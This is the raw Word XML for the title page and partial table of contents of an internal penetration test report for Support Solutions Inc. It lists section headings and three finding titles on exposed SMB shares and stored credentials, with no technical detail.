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8656" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00635C3F">
      <w:pPr>
        <w:spacing w:after="1200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081D8657" w14:textId="5E88ED7B" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="1600"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00CD2A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t>UPPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8658" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:before="800" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Internal Penetration Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8659" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="1200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Report of Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D865A" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00635C3F">
      <w:pPr>
        <w:spacing w:after="3600"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081D865B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="82C91E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Support Solutions Inc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D865C" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>June 24, 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D865D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="777777"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Version 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D865E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00635C3F">
      <w:pPr>
        <w:sectPr w:rsidR="00635C3F" w:rsidSect="0081451F">
          <w:headerReference w:type="default" r:id="rId7"/>
          <w:footerReference w:type="default" r:id="rId8"/>
          <w:headerReference w:type="first" r:id="rId9"/>
          <w:footerReference w:type="first" r:id="rId10"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081D865F" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc233206056"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6B1D0CD1" w14:textId="234C35CA" w:rsidR="00F10C23" w:rsidRDefault="00E22FF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3206056" w:history="1">
        <w:r w:rsidR="00F10C23" w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table of Contents</w:t>
        </w:r>
        <w:r w:rsidR="00F10C23">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F10C23">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F10C23">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206056 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F10C23">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F10C23">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F10C23">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00F10C23">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54819BC5" w14:textId="5FF7F9F0"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57" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Statement of Confidentiality</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206057 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B41B980" w14:textId="6F098432"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58" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Engagement Contacts</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206058 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73760A4F" w14:textId="29507E63" w:rsidR="00F10C23" w:rsidRDefault="00F10C23">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59" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Support Solutions Contacts</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206059 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12767C5A" w14:textId="6A628B93" w:rsidR="00F10C23" w:rsidRDefault="00F10C23">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0" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Assessor Contact</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206060 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="668D41B7" w14:textId="226ACD95"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1" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Executive Summary</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206061 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="541EEC16" w14:textId="00FDF3BA"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2" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Approach</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206062 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4153E354" w14:textId="10E9FEB5"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3" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Scope</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206063 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A44F777" w14:textId="6B811527"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4" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Assessment Overview and Recommendations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206064 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52D663ED" w14:textId="19182EB7"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5" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Network Penetration Test Assessment Summary</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206065 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05C450D2" w14:textId="4ED4F837"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6" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Summary of Findings</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206066 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="575D33F9" w14:textId="3E5A1CC2"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7" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Internal Network Compromise Walkthrough</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206067 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D9FAD54" w14:textId="13293D32"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8" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Detailed Walkthrough</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206068 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61C92922" w14:textId="6FE0861F"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69" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Detailed Reproduction Steps</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206069 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D3BF156" w14:textId="1F7419A3"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0" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Remediation Summary</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206070 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FA67756" w14:textId="0D2E1460"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1" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Short Term</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206071 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="303D0B44" w14:textId="46883971"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2" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Medium Term</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206072 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30E5EE45" w14:textId="58BD9C64"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3" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Long Term</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206073 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FF29A3D" w14:textId="23053D09"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4" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Technical Findings Details</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206074 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="191419D0" w14:textId="69A3FED8"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5" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1. Anonymous SMB Share Exposing Sensitive Utility Binary — Medium</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206075 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="332EF996" w14:textId="39B390A0"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6" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2. Hardcoded / Weakly-Obfuscated Credentials in Distributed Binary — High</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206076 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C29ABBC" w14:textId="3FCE79C8"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7" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3. Cleartext Credential Stored in Active Directory “info” Attribute — High</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206077 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
